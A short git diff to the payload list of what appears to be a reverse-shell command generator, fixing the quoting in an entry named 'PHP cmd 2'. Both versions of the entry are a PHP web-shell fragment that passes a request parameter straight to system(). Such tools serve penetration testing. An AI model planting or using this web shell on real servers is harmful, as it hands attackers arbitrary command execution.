diff --git a/js/data.js b/js/data.js index beef7b8..057cebe 100644 --- a/js/data.js +++ b/js/data.js @@ -158,7 +158,7 @@ const reverseShellCommands = withCommandType( }, { "name": "PHP cmd 2", - "command": "\"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo \"<\/pre>\"; die; }?>", + "command": "\"; $cmd = ($_REQUEST[\"cmd\"]); system($cmd); echo \"<\/pre>\"; die; }?>", "meta": ["linux", "windows", "mac"] }, {